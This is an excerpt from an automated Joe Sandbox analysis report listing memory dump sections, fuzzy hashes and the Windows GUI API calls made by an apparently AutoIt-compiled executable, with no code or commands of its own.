                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                                  • Opcode ID: de316c34264f802ad97e41e2d96b97a4976e2443a0324b54249a0beeda03384a
                                                                                                                                                  • Instruction ID: 5f0b767449e3d37fa0a9cb76ca1a1966b2bcebad2f74a673b8e7725f9ca30b43
                                                                                                                                                  • Opcode Fuzzy Hash: de316c34264f802ad97e41e2d96b97a4976e2443a0324b54249a0beeda03384a
                                                                                                                                                  • Instruction Fuzzy Hash: E2A0113000020CAB8A022B82EC08888BFACEA022A0B008030F80C808228B32A8208A88
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_a70000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 44dc27fcbe7fd6b5fcc9a8f97fa6612ef5537593baa27d9728e77007d9c8b16a
                                                                                                                                                  • Instruction ID: 657ef41db75ec8abfbadfc547736c3d2e96703de55ce049220683effc52d235e
                                                                                                                                                  • Opcode Fuzzy Hash: 44dc27fcbe7fd6b5fcc9a8f97fa6612ef5537593baa27d9728e77007d9c8b16a
                                                                                                                                                  • Instruction Fuzzy Hash: 36822E76B083108BD748DF18D89075EF7E2ABCC314F1A893DA999E7354DA74EC118B86
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_a70000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: ad5aee49de51e62de7c95714716719574099b53ca3c25a1455185705a6b8fcfe
                                                                                                                                                  • Instruction ID: 0acf6f8ac71b53bda6553fff6b3f4595de84c37104406a01fbb3dc4360e41687
                                                                                                                                                  • Opcode Fuzzy Hash: ad5aee49de51e62de7c95714716719574099b53ca3c25a1455185705a6b8fcfe
                                                                                                                                                  • Instruction Fuzzy Hash: 8C32F022D29F414DD7239635D822776A25CAFB73C4F16D727E81AB5EA6EF28C5C34200
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bc918cabfbc13eeeaccb278bb908b555cf4655f640fadc8373e86b06f087c2cb
• Instruction ID: d3e05baf70842595a15b67714876080b4d37379fdc1224c105ba09137936e944
• Opcode Fuzzy Hash: bc918cabfbc13eeeaccb278bb908b555cf4655f640fadc8373e86b06f087c2cb
• Instruction Fuzzy Hash: 44223730904506CBDF288A68C4A47BEB7A1BF41345F28816FDD468B693DB7C9CD6C74A
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
• Instruction ID: 35e5cfd0643d00128ec34ecd890c43f992cb4d917009b55117061340238bc551
• Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
• Instruction Fuzzy Hash: 18C1D83230507349DF2D4639953403FFAA15EA27B139A076FD8B3CB2D4EE18D965D624
Memory Dump Source
• Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_a70000_x.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 55ecd314b4c5383ae3b665146288c950318f51326a4b3437a406d7ccc6c14070
• Instruction ID: 2e0bbc56ef757260324170f90567a80bb18125bfb7be6c338a2c883e8a3ed44a
• Opcode Fuzzy Hash: 55ecd314b4c5383ae3b665146288c950318f51326a4b3437a406d7ccc6c14070
• Instruction Fuzzy Hash: 21D17F72A187818FC318DE5CC89165AFBE2EBD5300F488A3DE5D6D7785D674E809CB82
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
• Instruction ID: 4494295b5c4546222a84ad3f443fcd2c01bced2acdb834a923f1c328fe2fc13d
• Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
• Instruction Fuzzy Hash: CAC1D4333090B34ADF2D4639953403FBAA15EA27B139B036FD4B2DB2D4EE18D925D624
Memory Dump Source
• Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_a70000_x.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9cf6abe3ae1924d79ced2347cf2a35a1b4fa91b2ca7a0e5006e3b059655bbd5e
• Instruction ID: 1bf3e2a715f1775a2e489b1f230c6c4133871ece6c98770d03cfc4c53e8cbc29
• Opcode Fuzzy Hash: 9cf6abe3ae1924d79ced2347cf2a35a1b4fa91b2ca7a0e5006e3b059655bbd5e
• Instruction Fuzzy Hash: E4A192B29093109FC344CF1AD88055BBBE2BFC8614F5AC96EF89897315D730E9458F8A
Memory Dump Source
• Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_a70000_x.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 22795c9ed03d84af6dcafcb4bd33591edb2504b77a473f2716c7a4c8c56812e9
• Instruction ID: ff6d5df8c18bcbe8fe2101f5cfd884a08bdb116bda97db56ce45bba43b3dbdc4
• Opcode Fuzzy Hash: 22795c9ed03d84af6dcafcb4bd33591edb2504b77a473f2716c7a4c8c56812e9
• Instruction Fuzzy Hash: 5A6160736197818FC32CCE2CC89145ABBE2EEA521474C8F6DD4D687792D670FA09C792
Memory Dump Source
• Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_a70000_x.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 57a85e8b12e82fb41159f56d97629d3c102e4caf28362fdc83b8f9dd0bf449d7
• Instruction ID: f2aa86b5088524225bca57406a5d1397d8899325cb8a078ba8ccbdd46887f550
• Opcode Fuzzy Hash: 57a85e8b12e82fb41159f56d97629d3c102e4caf28362fdc83b8f9dd0bf449d7
• Instruction Fuzzy Hash: 6E6102359287A44BC316EF3DEC416BAB394FFE6384F54C73EEA8562AA1DB3415068344
Memory Dump Source
• Source File: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ab2fee5558319bb7b77599fdacabd9ee24db5531fb8add38223017fc8891590f
• Instruction ID: 297c42746ce6ffc5d2f8a126e26e4f05b1c83496421ee1d12b76a76bc897e528
• Opcode Fuzzy Hash: ab2fee5558319bb7b77599fdacabd9ee24db5531fb8add38223017fc8891590f
• Instruction Fuzzy Hash: 1E3146329053405ECF328AAC98746B53F64BB62777F1D21A7EC419B192F221BE4CC6A0
Memory Dump Source
• Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_a70000_x.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5c43cf1957d3bc441ab92b017139291c580ea0826359af548bc1dc2c5e6896f3
• Instruction ID: 314dd83f6ad7259ddaea2a45ad32d70ac6da9fe99edca33744150a5492d51df5
• Opcode Fuzzy Hash: 5c43cf1957d3bc441ab92b017139291c580ea0826359af548bc1dc2c5e6896f3
• Instruction Fuzzy Hash: A841E7306483554FC728EF29E8E467BB3D1FBC9315F65893ED6C683281CA386416CB51
Memory Dump Source
• Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_a70000_x.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b33081dabc7f6469ce34c37c8165833aea82e5abc41e973800425e6ee7c24666
• Instruction ID: 1f93681bd071c9b310666e60ae9e723361838b6add535ed4ccf0dafbb0d06587
• Opcode Fuzzy Hash: b33081dabc7f6469ce34c37c8165833aea82e5abc41e973800425e6ee7c24666
• Instruction Fuzzy Hash: 1E4170756183019F8348CF69C58091AFBE2BFCC318F25896EE8999B311D735E942CF92
Memory Dump Source
• Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_a70000_x.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c76a15beeee963c4f84a445264956e8a3ca97236d94a4da0cbf7fb091b069d5c
• Instruction ID: b5869b5d75bce0de78fe886a00a9b2f8a43124a0caffc1323e520ea091567c1b
• Opcode Fuzzy Hash: c76a15beeee963c4f84a445264956e8a3ca97236d94a4da0cbf7fb091b069d5c
• Instruction Fuzzy Hash: 4441AF456DE1C21EEB0B0B7190762E2EFF16CAF0487AEAAD9C0D80E203C503C587DB94
Memory Dump Source
• Source File: 00000001.00000002.1738404215.0000000000BF6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BF6000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_bf6000_x.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
• Instruction ID: f2db7853595e1a06e118b7615eb5f70a8bd784dd372968c1087cbf83a1baa70e
• Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
• Instruction Fuzzy Hash: BE41A271D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D730AB41DB90
Memory Dump Source
• Source File: 00000001.00000002.1738404215.0000000000BF6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BF6000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_bf6000_x.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
• Instruction ID: 022197080262dcb74295c545e5ad403c58f764df0ba37eedbad2e7d669b6a3fa
• Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
• Instruction Fuzzy Hash: 1C018079A01209EFCB48DF98C5909AEF7F5FB58310F2085DAE909A7741D730AE41DB80
Memory Dump Source
• Source File: 00000001.00000002.1738404215.0000000000BF6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BF6000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_bf6000_x.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
• Instruction ID: 5ee726c0e0e4ac96ef20b6470aae070e0619b57094b2eb40580fb129df3ad67a
• Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
• Instruction Fuzzy Hash: 45019278A01209EFCB44DF98C5909AEF7F5FB58310F2085D9E909A7741D730AE41DB80
Memory Dump Source
• Source File: 00000001.00000002.1738404215.0000000000BF6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BF6000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_bf6000_x.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
• Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
• Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
• Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
Memory Dump Source
• Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_a70000_x.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
• Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
• Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
• Instruction Fuzzy Hash:
APIs
• CharUpperBuffW.USER32(?,?,0048F910), ref: 00483627
• IsWindowVisible.USER32(?), ref: 0048364B
Strings
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: BuffCharUpperVisibleWindow
• String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
• API String ID: 4105515805-45149045
• Opcode ID: df18ccac80ca4098b50a46d9e4b82a0c4588cfc9e14ecf85f4615084e1af2d64
• Instruction ID: 9f5fdaa8788cae778637d634d7abea83d78ef325d3b9343814b8d9d38e530adb
• Opcode Fuzzy Hash: df18ccac80ca4098b50a46d9e4b82a0c4588cfc9e14ecf85f4615084e1af2d64
• Instruction Fuzzy Hash: 28D19E702042009BCA04FF11C451A6E77E5AF55759F54886EF8826B3A3DB3DEE0ACB5A
APIs
• SetTextColor.GDI32(?,00000000), ref: 0048A630
• GetSysColorBrush.USER32(0000000F), ref: 0048A661
• GetSysColor.USER32(0000000F), ref: 0048A66D
• SetBkColor.GDI32(?,000000FF), ref: 0048A687
• SelectObject.GDI32(?,00000000), ref: 0048A696
• InflateRect.USER32(?,000000FF,000000FF), ref: 0048A6C1
• GetSysColor.USER32(00000010), ref: 0048A6C9
• CreateSolidBrush.GDI32(00000000), ref: 0048A6D0
• FrameRect.USER32(?,?,00000000), ref: 0048A6DF
• DeleteObject.GDI32(00000000), ref: 0048A6E6
• InflateRect.USER32(?,000000FE,000000FE), ref: 0048A731
• FillRect.USER32(?,?,00000000), ref: 0048A763
• GetWindowLongW.USER32(?,000000F0), ref: 0048A78E
  • Part of subcall function 0048A8CA: GetSysColor.USER32(00000012), ref: 0048A903
  • Part of subcall function 0048A8CA: SetTextColor.GDI32(?,?), ref: 0048A907
  • Part of subcall function 0048A8CA: GetSysColorBrush.USER32(0000000F), ref: 0048A91D
  • Part of subcall function 0048A8CA: GetSysColor.USER32(0000000F), ref: 0048A928
  • Part of subcall function 0048A8CA: GetSysColor.USER32(00000011), ref: 0048A945
  • Part of subcall function 0048A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0048A953
  • Part of subcall function 0048A8CA: SelectObject.GDI32(?,00000000), ref: 0048A964
  • Part of subcall function 0048A8CA: SetBkColor.GDI32(?,00000000), ref: 0048A96D
  • Part of subcall function 0048A8CA: SelectObject.GDI32(?,?), ref: 0048A97A
  • Part of subcall function 0048A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0048A999
  • Part of subcall function 0048A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0048A9B0
  • Part of subcall function 0048A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0048A9C5
  • Part of subcall function 0048A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0048A9ED
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
• String ID:
• API String ID: 3521893082-0
• Opcode ID: 6e91d171cf065a250873850148fbfb75f7cc15900c33b280261b9dfca8494969
• Instruction ID: fb34620bd59db4fe0d00bba54468f49f6ea6f7247eb536f08ce7ecc3d6e9d283
• Opcode Fuzzy Hash: 6e91d171cf065a250873850148fbfb75f7cc15900c33b280261b9dfca8494969
• Instruction Fuzzy Hash: 5E917D72408301BFD710AF64DC08A5F7BA9FB89321F100F2EF962961A1D774D949CB5A
APIs
• DestroyWindow.USER32(?,?,?), ref: 00402CA2
• DeleteObject.GDI32(00000000), ref: 00402CE8
• DeleteObject.GDI32(00000000), ref: 00402CF3
• DestroyIcon.USER32(00000000,?,?,?), ref: 00402CFE
• DestroyWindow.USER32(00000000,?,?,?), ref: 00402D09
• SendMessageW.USER32(?,00001308,?,00000000), ref: 0043C43B
• ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0043C474
• MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0043C89D
  • Part of subcall function 00401B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00402036,?,00000000,?,?,?,?,004016CB,00000000,?), ref: 00401B9A
• SendMessageW.USER32(?,00001053), ref: 0043C8DA
• SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0043C8F1
• ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0043C907
• ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0043C912
Strings
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
• String ID: 0
• API String ID: 464785882-4108050209
• Opcode ID: 4375e54c2866febaad8ffc9ac244cdd1ac029a08f3163fb11202e14e0822a081
• Instruction ID: 2a922f2165ff82378a3b73503dcd1cf133edd61f128b8a365017e979e5fddc8b
• Opcode Fuzzy Hash: 4375e54c2866febaad8ffc9ac244cdd1ac029a08f3163fb11202e14e0822a081
• Instruction Fuzzy Hash: E112BF30604211EFDB15DF24C988BAAB7E1BF08304F54557EE855EB2A2C779E842CF99
APIs
• DestroyWindow.USER32(00000000), ref: 004774DE
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0047759D
• SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004775DB
• AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 004775ED
• CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00477633
• GetClientRect.USER32(00000000,?), ref: 0047763F
• CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00477683
• CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00477692
• GetStockObject.GDI32(00000011), ref: 004776A2
• SelectObject.GDI32(00000000,00000000), ref: 004776A6
• GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 004776B6
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 004776BF
• DeleteDC.GDI32(00000000), ref: 004776C8
• CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004776F4
• SendMessageW.USER32(00000030,00000000,00000001), ref: 0047770B
                                                                                                                                                  • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00477746
                                                                                                                                                  • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0047775A
                                                                                                                                                  • SendMessageW.USER32(00000404,00000001,00000000), ref: 0047776B
                                                                                                                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0047779B
                                                                                                                                                  • GetStockObject.GDI32(00000011), ref: 004777A6
                                                                                                                                                  • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 004777B1
                                                                                                                                                  • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 004777BB
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                  • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                  • API String ID: 2910397461-517079104
                                                                                                                                                  • Opcode ID: 06145267f47237950f9bf2b394788d14c0e7c77fc12a147c01bfcfc54d464a41
                                                                                                                                                  • Instruction ID: a65668349d9d90c20bc2e89cb33f711f17b366ce89c6f6fccfd6c75f405f0b1e
                                                                                                                                                  • Opcode Fuzzy Hash: 06145267f47237950f9bf2b394788d14c0e7c77fc12a147c01bfcfc54d464a41
                                                                                                                                                  • Instruction Fuzzy Hash: C2A18371A00605BFEB14DBA4DC49FAE7BB9EB04714F008129FA14A72E1C774AD44CB68
                                                                                                                                                  APIs
                                                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0046AD1E
